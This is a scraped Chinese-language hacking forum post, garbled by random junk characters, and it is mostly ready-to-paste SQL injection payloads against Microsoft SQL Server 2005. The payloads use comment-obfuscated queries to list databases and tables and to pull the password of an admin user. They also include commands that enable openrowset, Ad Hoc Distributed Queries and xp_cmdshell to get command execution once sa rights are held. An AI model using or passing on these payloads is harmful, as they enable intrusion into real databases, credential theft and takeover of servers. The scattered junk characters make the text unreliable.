8 R/ \# B& M9 o1 m. J
, h- s- H$ d) ] W& c7 k' e4 H2 u% C1 _5 U
[Copy to clipboard]CODE:
0 J4 b9 s# O- Q5 P: U3 `/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
" d8 a; v8 H3 k2 |# d# {3 Y+ G( h3 t0 d5 S0 R, f! @4 E4 p @
爆表语句,somedb部份是所要列的数据库,红色数字1累加
# c3 ~; @- E* ?. H* q1 V9 k& e* i8 O! {# Y; [3 B& K1 W
. s- y& B3 Q" ]
[Copy to clipboard]CODE:
% p" |8 L" v5 j H+ f0 _- i, O6 J% ] A/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--! i& @* b: N, ^
# i, }& H, u I# }! i
爆字段语句,爆表admin里user='icerover'的密码段. J5 g) I) I x$ V; l2 _' f; R2 U3 z
( J9 Z7 B' k" U) R3 l, p/ `4 ?: R+ F3 U# O7 m- y9 J
[Copy to clipboard]CODE:
/ A7 t4 A8 X( u9 M: p**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--7 u# s1 l% v* l, O" b
, p8 n, b* ^: s& O; s
mssql2005默认没有开xp_cmdshell的,openrowset也不能用5 F0 y: `, s4 [" s0 t) U# g5 G, [
如果是sa权限,可以这样来开启& I6 {7 w% w$ D) ?
开启openrowset: C* f; g% m+ T9 W% T% e, X' k$ K' C
- n$ B6 c5 U' J9 Z5 B; e# q! o
: P2 W9 Y* S4 ^' u+ ~4 a4 |1 \
[Copy to clipboard]CODE:: m0 k0 M" x( t+ e2 N+ i0 ?7 m
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
O) g/ s' f# A u9 j9 l/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--8 I9 `3 V# ]: E9 L% H' E
& O7 W: c5 D7 }9 Y. Y1 ~
开启xp_cmdshell! D, i& } E4 P$ c; J
, {; w- e9 z, s; ?# w# l4 D, D$ O
Q# p( J3 {9 ]/ g' G j6 O; x1 K
[Copy to clipboard]CODE:5 I F1 G3 o" C- p. J
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
& f; x5 ]$ G2 g. B `+ H% w8 X" CEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--9 k. d0 `' V, W: k X9 F) n
9 w1 r& w$ i- `7 O
ok,over~~晚安* S4 A0 g' x+ b$ r- G
|